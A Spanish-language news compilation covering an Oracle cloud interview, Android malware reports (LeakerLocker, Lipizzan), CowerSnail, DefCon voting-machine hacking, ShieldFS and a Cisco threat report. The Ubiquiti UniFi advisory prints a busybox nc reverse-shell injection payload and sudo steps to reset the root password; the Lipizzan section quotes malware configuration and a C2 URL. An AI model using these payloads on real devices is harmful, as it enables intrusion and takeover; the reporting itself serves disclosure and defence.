Oracle expande su oferta de Cloud at Customer con servicios PaaS y SaaS

ITware Latam entrevistó a Nirav Mehta, Enterprise Account Manager, Private Cloud Infrastructure de la compañía, para conocer en detalle de qué manera la compañía busca apoyar a sus clientes en su camino a la Nube con esta nueva propuesta. “En América Latina, esta oferta ayudará a extender la huella de Oracle Cloud a países que no tienen un Data Center Oracle Cloud local”, enfatizó.

Nirav Mehta, Enterprise Account Manager, Private Cloud Infrastructure de Oracle.

Oracle Cloud at Customer es una plataforma de infraestructura en la Nube que se basa en hardware convergente de la compañía, almacenamiento y redes definidas por software, además de una abstracción de IaaS del más alto nivel. La compañía administra y mantiene la esta infraestructura en las instalaciones de los clientes para que puedan concentrarse en utilizar los servicios IaaSPaaS y SaaS.

De esta manera, Oracle responde a las necesidades de muchas organizaciones que si bien buscan trasladar sus cargas de trabajo empresariales a la Nube pública, se han visto limitadas por requisitos comerciales, legislativos y normativos.

Thomas Kurian
President, Product Development, de Oracle.

Los servicios de Oracle ofrecen a las organizaciones la posibilidad de elegir dónde residirán sus datos y aplicaciones, así como una ruta natural para trasladar fácilmente aplicaciones empresariales críticas a la Nube pública con el tiempo. Con esta expansión significativa en la variedad de servicios disponibles, la compañía busca facilitar a las organizaciones trasladar sus cargas de trabajo a la Nube al tiempo que las conservan en sus propias instalaciones.

Como gran novedad, el portafolio ahora abarca todas las principales categorías de PaaS y, por primera vez, incluye también sus servicios SaaS, incluyendo ERPHuman Capital Management (HCM)CRM y Supply Chain Management (SCM). “Oracle continuará construyendo los servicios ofrecidos basados en la demanda y necesidad de los clientes”, prometió el entrevistado.

Mehta hizo hincapié en la ampliación realizada por la compañía sobre Oracle Cloud en Customer desde su introducción hace un año: “Inicialmente, ofrecimos un puñado de servicios PaaS, incluyendo Oracle Database Cloud y Oracle Java Cloud, y en los últimos 12 meses hemos aumentado las capacidades y ampliado la gama de servicios para que los clientes puedan mover más cargas de trabajo en forma transparente”, detalló. “Estamos añadiendo soporte para docenas de nuevos servicios en todas las principales categorías de Oracle PaaS: desarrollo de aplicaciones, gestión de datos, integración, Big DataAnalytics y seguridad”, destacó.

Estos servicios hacen uso de las mejoras específicas que se han realizado a la plataforma subyacente de Oracle Cloud at Customer, como servidores con CPU más rápidos y almacenamiento flash basado en NVMe, así como almacenamiento de bloque solo en flash.

Asimismo, el ejecutivo explicó que la nueva Oracle Big Data Cloud Machine es un sistema optimizado que entrega una plataforma Hadoop y Spark de producción con la potencia de nodos dedicados y la flexibilidad y simplicidad de una oferta en la nube: “Las organizaciones pueden ahora acceder a una gama completa de herramientas Hadoop, Spark y Analytics en un modelo de suscripción simple en sus propios Data Centers”, sostuvo.

El impacto en Latinoamérica

Al ser consultado sobre cómo afectarán estos servicios a los clientes de Oracle en Latinoamérica, Mehta sostuvo que esta oferta ayudará a extender la huella de Oracle Cloud a países que no tienen un centro de datos local de la compañía. “En lugar de tener que acceder a la nube de Oracle a través de Internet con latencia potencialmente alta, las organizaciones pueden tener servicios de nube públicos justo al lado de sus aplicaciones locales existentes y comunicarse con estos servicios en la nube con latencia cercana a cero”, destacó.

En ese sentido, aseguró que desde Oracle están viendo una fuerte adopción en Latinoamérica en los sectores de saludfinanciero y público, donde la residencia y la privacidad de datos desempeña un papel importante en la selección de una solución tecnológica.

En lo que respecta al rol de los channel partners en esta nueva oferta de Oracle, el ejecutivo aseguró que les ofrece “una herramienta más para satisfacer las necesidades de sus clientes”. A modo de ejemplo, mencionó el caso de Mythics, que trabajó recientemente con la Universidad Estatal de Nueva York, el sistema universitario más amplio de Estados Unidos, para implementar Oracle Cloud en el cliente.

Finalmente, aseguró: “En Latinoamérica, hemos tenido varios proyectos dirigidos por socios de canal, que revende el servicio y luego ofrece servicios de valor agregado para mejorar la experiencia del cliente o integrar los nuevos servicios en la nube con las aplicaciones existentes”.

Más información

Oracle Cloud at Customer

LeakerLocker, el malware para Android que amenaza con chivarse a tus contactos

Nacido a principios de 2016 y repuntando en los últimos días,LeakerLocker amenaza con mandar tu información personal (fotos, números, mensajes…) a todos tus contactos si no pagas un rescate. En su última campaña se ha hecho pasar por aplicaciones legítimas en Google Play.

La pantalla del resc

Bajo los nombres Wallpapers Blur HDBooster & Cleaner Pro, y Calls Recorder, se encontraba en Google Playhasta hace poco este peculiar malware. Entre otros, amenaza con enviar a todos tus contactos tus fotos, números de teléfono, mensajes de Facebook, correos electrónicos… Si no pagas una modesta cantidad. O al menos eso es lo que dice, porque no se ha encontrado esta supuesta funcionalidad en el código de la aplicación. Aunque tampoco se puede descartar, ya que este troyano contempla la ejecución de código arbitrario descargado de los servidores del atacante.

La línea temporal de este malware no es especialmente compleja. Primero, infecta al usuario haciéndose pasar por una aplicación legítima en Google Play. Segundo, recopila la información personal e información sobre el uso del dispositivo. Finalmente, y tras varias comprobaciones que comentamos a continuación, descarga código adicional de servidores del atacante y lo ejecuta. En este código se pueden observar funciones relacionadas con la apertura, gestión e intercepción de datos de WebViews (vistas web genéricas), funcionalidades usadas entre otras cosas para suplantar la identidad de aplicaciones legítimas y capturar sus credenciales. Pero aparte de bloquear el móvil con la imagen que se muestra arriba (y no permitir su uso hasta el pago) no realiza más actividades maliciosas.

Una de las funcionalidades más interesantes de este malware es la lista de comprobaciones que realiza para permitir su propia ejecución. A priori, uno puede pensar que, una vez infectados, lo interesante es que se ejecute siempre. Pero pensándolo bien sería interesante que no se ejecutase en condiciones de laboratorio (cuando se analiza el malware) para evitar su detección intencionada por expertos. Entre otras, realiza las siguientes comprobaciones:

  • Hay más de 10 contactos y más de 10 fotos
  • Constan 3 o más registros de llamadas
  • La aplicación se ha descargado a través de Google Play
 
Adicionalmente, la parte principal del malware no se ejecuta hasta pasados 15 minutos desde la infección, lo que es una contramedida contra técnicas de análisis automático.
Una de las aplicaciones por las que se hace pasar este malware
Para evitar infectarse con este tipo de malware, ya en Google Play, aquí van unos cuantos consejos aplicables por el usuario de a pie:

 

  • No instalar aplicaciones que usen la imagen o suplanten la identidad de aplicaciones oficiales (Una aplicación con el icono de WhatsApp)
  • Comprobar que los permisos que pide la aplicación para instalarse tienen sentido (una aplicación de una linterna que pide permiso para usar el micrófono, sospechoso…)
  • Comprobar los comentarios negativos, a veces avisar que es malware o incluso que la aplicación no funciona (hay mucho malware muy mal programado…)
  • No instalar aplicaciones que prometen funcionalidad maligna (hacer trampas en un juego o “hackear” WhatsApp, si es que te mereces la infección…)
Más información sobre este malware y su comportamiento se puede encontrar buscando en Koodous las muestras con los siguientes hashes:

 

cb0a777e79bcef4990159e1b6577649e1fca632bfca82cb619eea0e4d7257e7b
486f80edfb1dea13cde87827b14491e93c189c26830b5350e31b07c787b29387
299b3a90f96b3fc1a4e3eb29be44cb325bd6750228a9342773ce973849507d12
c9330f3f70e143418dbdf172f6c2473564707c5a34a5693951d2c5fc73838459
d82330e1d84c2f866a0ff21093cb9669aaef2b07bf430541ab6182f98f6fdf82
48e44bf56ce9c91d38d39978fd05b0cb0d31f4bdfe90376915f2d0ce1de59658
14ccc15b40213a0680fc8c3a12fca4830f7930eeda95c40d1ae6098f9ac05146
4701a359647442d9b2d589cbba9ac7cf56949539410dbb4194d9980ec0d6b5d4

Poniendo a prueba la seguridad de las máquinas de votación en la DefCon

El pasado fin de semana se celebró la famosa conferencia de seguridad DefCon en su 25ª edición. En esta ocasión,  el gobierno norteamericano cedió algunas máquinas de votación ya retiradas para que los investigadores disfrutaran y a la vez encontraran agujeros de seguridad para mejorar las nuevas remesas de máquinas.

Una de las máquinas cedidas fue la “ExpressPoll 5000”, que utilizaba un antiguo slot PCMCIA para transferir archivos, además de almacenar distintas bases de datos. Para empezar, hicieron un pequeño chequeo al sistema para sacar información general, como:

  • Sistema operativo Windows CE 5.0
  • El software estaba desarrollado en una aplicación usando .NET.
  • El software utilizaba WinForms en la interfaz de usuario.
  • El “bootloader” era propietario.
  • La arquitectura del procesador era ARM.
  • Contenía un fichero de base de datos en una tarjeta de memoria.

Tras probar múltiples exploits típicos para esta versión de Windows sin éxito, los investigadores se centraron en otro vector de ataque: la tarjeta de memoria.

Al arrancar el sistema con la tarjeta de memoria insertada, el bootloader comprueba un archivo llamado NK.BIN. Si está presente, lo carga en memoria RAM sin ningún tipo de comprobación de autenticidad. En ese momento se puede cambiar el firmware de manera permanente.

En este caso el archivo NK.BIN se utiliza para actualizaciones de Windows CE 5.0 en dicha máquina, pero un atacante puede subir y ejecutar cualquier Kernel NT e incluso una imagen con Linux (aunque esta última posibilidad no fue probada).

Inyección del nuevo bootloader


De manera similar a la que se cambia el firmware, también es posible cambiar el bootloader del sistema utilizando el fichero “EBOOT.BIN”. Se carga sin comprobar ninguna firma de integridad, al igual que el NK.BIN. Por desgracia esta vez la inyección no funcionó y el dispositivo quedó inservible.

Sobreescribiendo el archivo de recursos de la aplicación .NET

Cuando el software de ExpressPoll se lanza desde el botón “Lanzar” carga desde la tarjeta de memoria el archivo llamado “ExPoll.resources”. La idea de este archivo es poder definir imágenes, cadenas, botones, layouts, etc. Está pensado para personalizar la aplicación, por ejemplo sustituyendo el logotipo de Diebold.

El punto de fallo en el sistema es que los botones (y potencialmente otros elementos de la interfaz) se pueden sobreescribir para hacer otras acciones diferentes, como ejecutar un archivo almacenado en la tarjeta de memoria o ejecutar un comando en Windows CE.

La vulnerabilidad ha sido confirmada creando un archivo de recursos aleatorio de .NET, nombrándolo ExPoll.resources y copiándolo a la tarjeta de memoria. Como era de esperar, el sistema mostró un error, lo que significa que la carga del archivo funcionó. Pero al cargar un archivo corrupto se copió a memoria y dejando el sistema inservible en el proceso.

Bases de datos SQLite3

Pero sin duda una de las vulnerabilidades que más llamaron la atención es la del archivo de base de datos llamado “PollData.db3” en la tarjeta de memoria. Esta base de datos contenía toda la información de las encuestas, votantes… Usando esta información nos encontramos con varios tipos de posible ataques:

  • Filtración de información: Un atacante puede fácilmente extraer la tarjeta de memoria y reemplazarla por una que esté vacía.
  • Falsificación de información: Un atacante podría crear su propia base de datos y, reemplazando la tarjeta, cambiar los votos por unos falsos.
Datos de la base de datos. Fuente: blog.horner.tj

Puertos USB abiertos

El dispositivo dispone de una serie de puertos USB donde un atacante puede introducir un dispositivo para lanzar un ataque. A partir de aquí, las posibilidades quedan abiertas a la imaginación del lector.

Servidor web por defecto en WinCE

Windows CE tiene por defecto un servidor web abierto en el puerto 80 que se podría considerar como un riesgo de seguridad. Por ahora no han conseguido ningún ataque usando este vector, pero la investigación sigue abierta.

Los investigadores probaron otra serie de ataques, como desbordamientos de memoria usando “Bash Bunny” a través de los puertos USB, o introduciendo una base de datos de SQLite mayor de 1GB, sin que llegara a funcionar.

Más información:
Hacking Voting Machines at DEF CON 25
https://blog.horner.tj/post/hacking-voting-machines-def-con-25

De los creadores de SambaCry llega CowerSnail

El mismo grupo de atacantes – sin nombre conocido aún – que crearon SambaCry han creado este nuevo malware, el cual tiene como objetivo a sistemas Windows.

 

SambaCry fue detectado a principios de junio como un ataque que utilizaba la vulnerabilidad CVE-2017-7494 de Samba (de la que adquiere el nombre) para distribuirse. El objetivo de este malware es aprovechar los recursos del equipo infectado para minar criptomonedas, tales como Bitcoin, Latecoin, Monero, etc., instalando para ello el software CPUminer en el equipo víctima.
CowerSnail, es un backdoor que permite a los atacantes ejecutar cualquier comando en los sistemas infectados. Curiosamente, ambos troyanos usan el mismo C&C: cl.ezreal.space:20480. Lo que apunta a que ambos provienen de los mismo creadores según los investigadores de Kapersky Labs, que descubrieron ambas amenazas.
Sin embargo, hay pocas similitudes más allá de esta. Mientras que SambaCry atacaba a sistemas *nix, CowerSnail está enfocado a sistemas Windows. Además, algunos investigadores aseguran que este nuevo troyano cuenta con otras características especiales, como la recolección de información del equipo que infecta, y que van más allá de instalar software de minado.
Sergey Yunakovsky, de Kapersky Labs, afirma que:

Después de crear dos troyanos separados, cada uno para una plataforma específica, es muy probable que este grupo continúe produciendo malware en el futuro.

Más información:

CowerSnail, from the creators of SambaCry:

Lipizzan: el nuevo Malware espía detectado en Google Play

Hace unos días, Google anunciaba el descubrimiento de un nuevo malware para Android. Se trata de una aplicación maliciosa cuya misión es recopilar todo tipo de información personal sobre la víctima para después transmitirla al atacante.

El malware implementa rutinas para capturar datos de las principales aplicaciones de mensajería: WhatsApp, Telegram, Messenger, Skype, GMail, etc.

Además, permite controlar de forma remota la cámara, el micrófono y acceder a los archivos del dispositivo y a su localización.

Aunque no se conoce con seguridad su procedencia, los investigadores de Android Security han encontrado en su código referencias a Equus Technologies, una empresa israelí especializada en el desarrollo de herramientas de vigilancia. De hecho, para la investigación sobre Lipizzan se han utilizado las mismas técnicas que en el estudio de otras infecciones recientes como Chrysaor, desarrollada por NSO Group.

Logo de NSO Group

 

CÓMO INFECTA LIPIZZAN

El virus se camufla como una aplicación legítima para realizar backups o para limpiar el sistema, poniendose a disposición del público en distintos markets y repositorios (incluído Google Play). La infección tiene lugar en dos etapas:

  1. Una primera etapa, en la que la víctima descarga e instala la aplicación.
  2. Una segunda, etapa en la que tras comprobar que el dispositivo es vulnerable, descarga las instrucciones necesarias para rootear el dispositivo y controlarlo.
 
Muestra de la segunda componente:
Media Server [Koodous]
Las últimas variantes del virus cambian el nombre de paquete, y ahora transmiten el exploit de la segunda fase de forma cifrada, lo que dificulta la detección. Además dispone de mecanismos de detección de máquinas virtuales para ocultar su verdadero comportamiento ante los ojos del analista inexperto.
A continuación uno de los ficheros de configuración que recopila alguna información interesante sobre el malware:

Extensiones de los archivos objetivo

“extensions”: [“3dm”, “3ds”, “3fr”, “3g2”, “3gp”, “3gpp”, “3pr”, “7z”,
“ab4”, “accdb”, “accde”, “accdr”, “accdt”, “ach”, “acr”, “act”, “adb”,
“ads”, “agdl”, “ai”, “ait”, “al”, “apj”, “arw”, “asf”, “asm”, “asp”, “asx”,
“avi”, “awg”, “back”, “backup”, “backupdb”, “bak”, “bank”, “bay”, “bdb”,
“bgt”, “bik”, “bkp”, “blend”, “bpw”, “c”, “cdf”, “cdr”, “cdr3”, “cdr4”,
“cdr5”, “cdr6”, “cdrw”, “cdx”, “ce1”, “ce2”, “cer”, “cfp”, “cgm”, “cib”,
“class”, “cls”, “cmt”, “cpi”, “cpp”, “cr2”, “craw”, “crt”, “crw”, “crypt5”,
“crypt6”, “crypt7”, “crypt8”, “cs”, “csh”, “csl”, “csv”, “dac”, “db”, “db-journal”,
“db3”, “dbf”, “dc2”, “dcr”, “dcs”, “ddd”, “ddoc”, “ddrw”, “dds”, “der”, “des”,
“design”, “dgc”, “djvu”, “dng”, “doc”, “docm”, “docx”, “dot”, “dotm”, “dotx”, “drf”, “drw”, “dtd”, “dwg”, “dxb”, “dxf”, “dxg”, “eml”, “eps”, “erbsql”, “erf”, “exf”, “fdb”, “ffd”, “fff”, “fh”, “fhd”, “fla”, “flac”, “flv”, “fpx”, “fxg”, “gray”, “grey”, “gry”, “h”, “hbk”, “hpp”, “ibank”, “ibd”, “ibz”, “idx”, “iif”, “iiq”, “incpas”, “indd”, “java”, “jpe”, “kc2”, “kdbx”, “kdc”, “key”, “kpdx”, “lua”, “m”, “m4v”, “max”, “mdb”, “mdc”, “mdf”, “mef”, “mfw”, “mmw”, “moneywell”, “mos”, “mov”, “mp3”, “mp4”, “mpg”, “mrw”, “mrw”, “msg”, “myd”, “nd”, “ndd”, “nef”, “nk2”, “nop”, “nrw”, “ns2”, “ns3”, “ns4”, “nsd”, “nsf”, “nsg”, “nsh”, “nwb”, “nx2”, “nx1”, “nyf”, “oab”, “obj”, “odb”, “odc”, “odf”, “odg”, “odm”, “odp”, “ods”, “odt”, “oil”, “orf”, “ost”, “otg”, “oth”, “otp”, “ots”, “ott”, “p12”, “p7b”, “p7c”, “pab”, “pages”, “pas”, “pat”, “pcd”, “pct”, “pdb”, “pdd”, “pdf”, “pef”, “pem”, “pfx”, “php”, “pl”, “plc”, “pot”, “potm”, “potx”, “ppam”, “pps”, “ppsm”, “ppsx”, “ppt”, “pptm”, “pptx”, “prf”, “ps”, “psafe3”, “psd”, “pspimage”, “pst”, “ptx”, “py”, “qba”, “qbb”, “qbm”, “qbr”, “qbw”, “qbx”, “qby”, “r3d”, “raf”, “rar”, “rat”, “raw”, “rdb”, “rm”, “rtf”, “rw2”, “rw1”, “rwz”, “s3db”, “sas7bdat”, “say”, “sd0”, “sda”, “sdf”, “sldm”, “sldx”, “sql”, “sqlite”, “sqlite3”, “sqlitedb”, “sr2”, “srf”, “srt”, “srw”, “st4”, “st5”, “st6”, “st7”, “st8”, “stc”, “std”, “sti”, “stw”, “stx”, “svg”, “swf”, “sxc”, “sxd”, “sxg”, “sxi”, “sxm”, “sxw”, “tex”, “tga”, “thm”, “tlg”, “txt”, “vob”, “wallet”, “wav”, “wb2”, “wmv”, “wpd”, “wps”, “x11”, “x3f”, “xis”, “xla”, “xlam”, “xlk”, “xlm”, “xlr”, “xls”, “xlsb”, “xlsm”, “xlsx”, “xlt”, “xltm”, “xltx”, “xlw”, “ycbcra”, “yuv”, “zip”],
Lista negra de aplicaciones

“blacklist_apps”: [“org.antivirus”, “com.antivirus”, “com.avast.android.mobilesecurity”, “com.cleanmaster.security”, “com.avira.android”, “com.trustgo.mobile.security”, “com.kms.free”, “com.kaspersky.kes”, “com.kaspersky.lightscanner”, “com.cleanmaster.mguard”, “com.lookout.enterprise”, “com.wsandroid.suite”, “com.eset.ems2.gp”, “com.symantec.enterprise.mobile.security”, “com.qihoo.security”,
“org.malwarebytes.antimalware”, “com.trendmicro.tmmssuite.mdm”, “com.trendmicro.virdroid”, “com.bitdefender.antivirus”, “com.zimperium.zips”, “com.psafe.msuite”, “com.sophos.smsec”, “com.drweb”, “com.drweb.mcc”, “com.bullguard.mobile.mobilesecurity”, “com.bullguard.mobilebackup”, “net.nshc.droidx3”, “net.nshc.droidx3web”, “com.sophos.appprotectionmonitor”, “com.sophos.smsec”, “com.sophos.mobilecontrol.client.android”, “com.sophos.smenc”, “com.comodo.cisme.antivirus”, “com.quickheal.platform”, “com.mobandme.security.virusguard”, “de.gdata.mobilesecurity”, “de.gdata.securechat”, “com.webroot.security.sme”, “com.webroot.secureweb”, “com.ahnlab.v3mobileplus”, “com.antiy.avlpro”, “com.antiy.avl”],

 

 

Servidor de contacto

“api_url”: “https://vps.equus-tech.com:44001”,

ALGUNAS MUESTRAS DE LIPIZZAN

Primeras versiones de Lipizzan

Versiones actualizadas de Lipizzan

Las aplicaciones ya se encuentran fuera de Google Play y los pocos usuarios infectados (unos 100) ya han sido debidamente notificados.
Como siempre y como recomendación: sentido común y desconfiar de aplicaciones poco conocidas.

MÁS INFORMACIÓN:

Información oficial de los desarrolladores de Google
Repositorio con muestras de Lipizzan

Múltiples vulnerabilidades críticas en Ubiquiti Networks UniFi Cloud Key

Se han revelado varias vulnerabilidades críticas en los dispositivos Ubiquiti Networks UniFi Cloud Key que podrían permitir la inyección de comandos, la obtención de la contraseña del usuario y elevar privilegios.

 

La primera de las vulnerabilidades se encuentra en el fichero ‘api.inc’ y podría permitir una inyección de comandos a través del envío a la víctima de un enlace de actualización para el firmware de UniFi Cloud Key especialmente manipulado. Así sería posible utilizar una shell inversa para obtener acceso al dispositivo.

;busybox nc <IP-Origen> <Puerto-Origen> -e /bin/bash;
http://enlace-utilizado-para-ocultar-el-comando-en-la-ventana-de-actualizacion

En este punto se podría obtener la contraseña del usuario debido a un segundo fallo de seguridad: el fichero ‘system.cfg’ almacena los nombres de usuario y hashes MD5 de las contraseñas, los cuales se podrían romper en un tiempo razonable. Y, aunque el usuario de la interfaz web ‘www-data’ tiene permisos limitados de acceso y ejecución, sí puede leer dicho archivo de configuración.

Una vez obtenida la contraseña del usuario, sería posible modificar la configuración de la red inalámbrica.

Además existe una tercera vulnerabilidad que podría permitir secuestrar al usuario ‘root’ y elevar privilegios en el dispositivo. El fallo, ubicado en el fichero ‘/etc/sudoers.d/cloudkey-webui’, consiste en que algunos binarios permiten la ejecución a través de “sudo” sin solicitar la contraseña de ‘root’. De tal forma que la contraseña del usuario “root” puede ser modificada por el usuario ‘www-data’ a pesar de tener permisos limitados a mediante el binario ‘ubnt-systool’. Ejemplo:

$ cd /tmp
$ echo “root:password” > file.txt
$ /usr/bin/sudo /sbin/ubnt-systool chpasswd < file.txt

Aunque estos errores fueron descubiertos el pasado mes de Febrero por SEC Consult, la información no ha sido revelada hasta el momento para permitir una ventana temporal suficiente tanto para que el fabricante liberase una solución como para que los usuarios pudiesen actualizar sus dispositivos.

Se ha comprobado que las versiones 0.5.9 y 0.6.0, y potencialmente versiones anteriores, de Ubiquiti Networks UniFi Cloud Key son vulnerables. Para solucionar estos problemas es necesario instalar la actualización del firmware v0.6.1 o superior.

Más información:
Ubiquiti Networks UniFi Cloud Key multiple critical vulnerabilities
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20170727-0_Ubiquiti_Networks_UniFi_Cloud_Key_Multiple_Critical_Vulnerabilities_v10.txt

UniFi Cloud Key firmware download
https://www.ubnt.com/download/unifi

ShieldFS: un sistema de ficheros contra el ransomware

ShieldFS es un sistema de ficheros que nace fruto de la investigación de un equipo del Politécnico de Milán. Durante meses, recolectaron datos de millones de peticiones de I/O realizadas por aplicaciones legítimas en sistemas operativos limpios, y por ransomware en equipos infectados. Esto permitió ver las diferencias entre ambos y establecer modelos de comportamiento.

En general, al comparar con otros procesos, en el comportamiento típico del ransomware se realizan más lecturas, escrituras y cambios de nombre a un fichero, además de generar alta entropía en las operaciones de escritura. Hay un análisis pormenorizado de esta comparativa en la tabla 3 de su estudio.

Con estos datos en la mano, es posible reconocer el ransomware nada más comience su actividad maliciosa. Para esto, se diseñó una capa de protección y sistema de monitorización de procesos que se introdujo cono driver en el sistema de ficheros nativo de Windows. Al iniciarse un proceso desconocido, es monitorizado en sus primeros pasos en el sistema hasta que se puede discernir por su comportamiento que es seguro. En caso de detectar actividad propia del ransomware, el proceso queda bloqueado.

Comparación de actividad entre procesos benignos y ransomware. Tomado de http://shieldfs.necst.it/shieldfs-acsac16.pdf
Pero la funcionalidad del sistema de ficheros va más allá de este bloqueo. Además, se incluye un sistema de respaldo que mantiene copias recientes de los ficheros. De esta manera, tras la detección del ransomware, todos los ficheros escritos por este se sustituyen por un respaldo reciente en cuestión de segundos.

Esto es especialmente útil dado que, según los investigadores, en ocasiones los rescates se pagan simplemente porque los ficheros recientes son más valiosos para los usuarios. Los sistemas de respaldo tradicionales deben llegar a un compromiso entre rendimiento, espacio y actualidad, y es complicado que tengan cambios recientes. Esta dificultad es eludida por ShieldFS al trabajar a más bajo nivel.

Funcionamiento de ShieldFS. Tomado de http://shieldfs.necst.it/shieldfs-acsac16.pdf

Para las pruebas del sistema, se llevaron a cabo infecciones de tres muestras de ransomware (TeslaCrypt, Critroni y ZeroLocker) en equipos reales de usuarios voluntarios detectando y restaurando la actividad maliciosa con éxito.

Sin embargo, el sistema tiene limitaciones. Por ejemplo, un atacante podría camuflar la actividad maliciosa inyectando código en los procesos benignos del sistema y dejando que cada uno de estos haga una pequeña parte del cifrado malicioso, camuflado así su actividad.

ShieldFS fue presentado el pasado diciembre en la Annual Computer Security Applications Conference de Los Angeles y el pasado miércoles en la Black Hat en Las Vegas. Aunque de momento pertenece al mundo académico, estaremos atentos al avance del proyecto para ver si representa un avance hacia la erradicación del ransomware, una amenaza que ha atacado con especial virulencia en los últimos meses.


Más información:
SHIELDFS: A Self-healing, Ransomware-aware Filesystem


ShieldFS: A Self-healing, Ransomware-aware Filesystem Paper [PDF]:

Informe de Cisco: prevén nuevos ataques de DeOS

Así surge del Reporte de Ciberseguridad de Mitad de año (MCR) de Cisco 2017. Además, se espera un crecimiento en la escala y el impacto de las amenazas. La compañía advierte que “industrias clave necesitan mejorar las medidas de seguridad al tiempo que convergen la tecnología de la información y la operativa”.

El Informe revela la rápida evolución de las amenazas y la creciente magnitud de los ataques, llevando a los investigadores a pronosticar actividades maliciosas potenciales de “destrucción de servicios” (DeOS) que podrían eliminar las copias de seguridad y las redes de seguridad de las organizaciones, que son necesarias para restaurar los sistemas y datos después de sufrir un ataque.

Los recientes ataques como WannaCry y Nyetya han mostrado la rápida propagación y el amplio impacto de los ataques de tipo ransomware, que en realidad pueden llegar a ser más destructivos. Esto presagia lo que Cisco ha llamado ataques de “Destrucción de Servicios”, que pueden ser inmensamente más perjudiciales que los tradicionales, dejando a las empresas sin ninguna opción a recuperarse.

“Con la llegada del Internet de las Cosas, las principales industrias están realizando más operaciones en línea, aumentando sus vulnerabilidades, la escala y el impacto potencial de los ataques”, advierte Cisco.

De acuerdo con Cisco el IoT sigue ofreciendo nuevas oportunidades para que los piratas informáticos exploten las debilidades de seguridad, jugando un papel central en la habilitación de estas campañas con un impacto cada vez mayor. “La actividad reciente de IoT Botnet sugiere que algunos criminales pueden estar sentando las bases para un ataque de gran alcance y alto impacto que podría perturbar la propia Internet”, sostiene.

En este sentido, medir la efectividad de las prácticas de seguridad de frente a esos ataques es crítico. Cisco registra progreso en el tiempo de detección (TTD), la ventana de tiempo entre un sistema comprometido y el tiempo de detección de un ataque.

Cisco asegura haber disminuido el TTD desde poco más de 39 horas en noviembre de 2015, hasta llevarla a alrededor de 3.5 horas en el período de noviembre de 2016 a mayo de 2017. Estas cifras se basan en la telemetría provenientes de los equipos de la marca desplegados a nivel mundial.

 

Qué es caliente y qué no lo es

Durante la primera mitad de 2017, los investigadores de seguridad de Cisco han observado la evolución del malware e identificaron cambios en la forma en que los piratas informáticos están adaptando sus técnicas de entrega, propagación y evasión.

Específicamente, la compañía se dio cuenta que estos delincuentes obligan cada vez más a la víctima a tomar medidas para activar una amenaza, como el hecho de hacer clic en un enlace o abrir un archivo; desarrollando malware sin programas instalados completamente en la memoria. Esto genera que sean más complicados de detectar o investigar a medida que se anulan cuando un dispositivo se reinicia, y también genera obstáculos y desconfianza en la infraestructura anónima y descentralizada, como un servicio proxy Tor, para ocultar las actividades de mando y control.

Cisco ha notado una importante disminución en los kits de explosión, pero otros ataques tradicionales están resurgiendo:

El volumen de spam aumenta significativamente, ya que muchos piratas informáticos recurren a métodos comprobados en el pasado, como el correo electrónico, para distribuir malware y generar ingresos. Los investigadores de las amenazas de Cisco anticipan que el volumen del spam con los accesorios maliciosos continuará aumentando, mientras que el panorama del kit de la explotación continúa en flujo.

El spyware y el adware, que a menudo son desechados por los profesionales de seguridad por considerarlos más molestias que potenciales daños, son formas de malware que persisten y traen riesgos a la empresa. La investigación de Cisco siguió a 300 compañías durante un período de cuatro meses y encontró que tres familias predominantes del spyware infectaron el 20% de la muestra.

La evolución de ransomware, como el crecimiento de ransomware-como-servicio, facilitan a cualquier criminal llevar a cabo estos ataques, independientemente de sus habilidades.

Si bien esta amenaza ha estado ocupando los titulares durante meses y supuestamente aportó más de mil millones de dólares en 2016, desde Cisco advierten que esto puede estar distrayendo a algunas organizaciones que se enfrentan a una amenaza aún mayor. Por ejemplo, el compromiso comercial de correo electrónico (BEC), un ataque de ingeniería social en el que un correo electrónico diseñado para engañar a las organizaciones a transferir dinero al atacante, se está convirtiendo en un vector de amenazas altamente lucrativo. Entre octubre de 2013 y diciembre de 2016, US$ 5.3 mil millones fueron robados a través de BEC de acuerdo a The Internet Crime Complaint Center.

Industrias únicas que enfrentan desafíos comunes

A medida que la tecnología de la información y la tecnología operativa convergen en la Internet de las Cosas, las organizaciones están luchando para mantener la privacidad. Como parte del Estudio de Benchmark de Capacidades de Seguridad, Cisco consultó alrededor de 3,000 líderes de seguridad en 13 países y encontró que en todas las industrias, los equipos de seguridad están cada vez más abrumados por el volumen de ataques que combaten, lo que hace que muchos se vuelvan más reactivos en sus esfuerzos de protección.

Entre otros hallazgos, el informe advierte que no más de dos tercios de las organizaciones están investigando las alertas de seguridad, y en ciertas industrias, como la salud y el transporte, este número está más cerca del 50 por ciento. Incluso en las industrias más sensibles, como las finanzas y la atención sanitaria, las empresas están debilitando menos del 50 por ciento de los ataques que saben legítimos.

En la mayoría de las industrias las brechas impulsaron al menos modestas mejoras de seguridad en al menos el 90 por ciento de las organizaciones, aunque algunas industrias (como el transporte) son menos sensibles, cayendo por encima del 80 por ciento

En cuanto al sector público, de las amenazas investigadas, el 32 por ciento son identificadas como legítimas, pero sólo el 47 por ciento de esas amenazas legítimas son finalmente remediadas.

En Venta al por menor, 32 porciento dijo que había perdido ingresos debido a los ataques en el último año, con un promedio de pérdida de clientes u oportunidades de negocio que giran alrededor del 25 por ciento

En cuanto a Manufactura, 40 por ciento de los profesionales de seguridad de esta industria dijeron que no tienen una estrategia de seguridad formal, ni siguen las prácticas estandarizadas de políticas de seguridad de la información como ISO 27001 o NIST 800-53.

En Servicios, los profesionales de seguridad dijeron que los ataques dirigidos (42 por ciento) y las amenazas persistentes avanzadas, o APT (40 por ciento) eran los riesgos de seguridad más críticos para sus organizaciones.

En el Sector salud, el 37 por ciento de las organizaciones de Salud dijo que los ataques dirigidos son riesgos de alta seguridad para sus organizaciones

Consejos de Cisco
Para combatir los ataques cada vez más sofisticados de hoy en día, las organizaciones deben tomar una postura proactiva en sus esfuerzos de protección. Cisco Security recomienda:
• Mantener actualizada la infraestructura y las aplicaciones, para que los atacantes no puedan explotar las debilidades públicamente conocidas

• Combatir la complejidad a través de una defensa integrada. Limitar las inversiones aisladas.

• Involucrar a los principales líderes ejecutivos para asegurar una comprensión completa de los riesgos, las recompensas y las restricciones presupuestarias

• Examinar el entrenamiento de seguridad de los empleados con capacitación basada en funciones frente a una capacitación igual para todos.

• Equilibrar la defensa con una respuesta activa. No “ponga y olvide” los controles o procesos de seguridad.

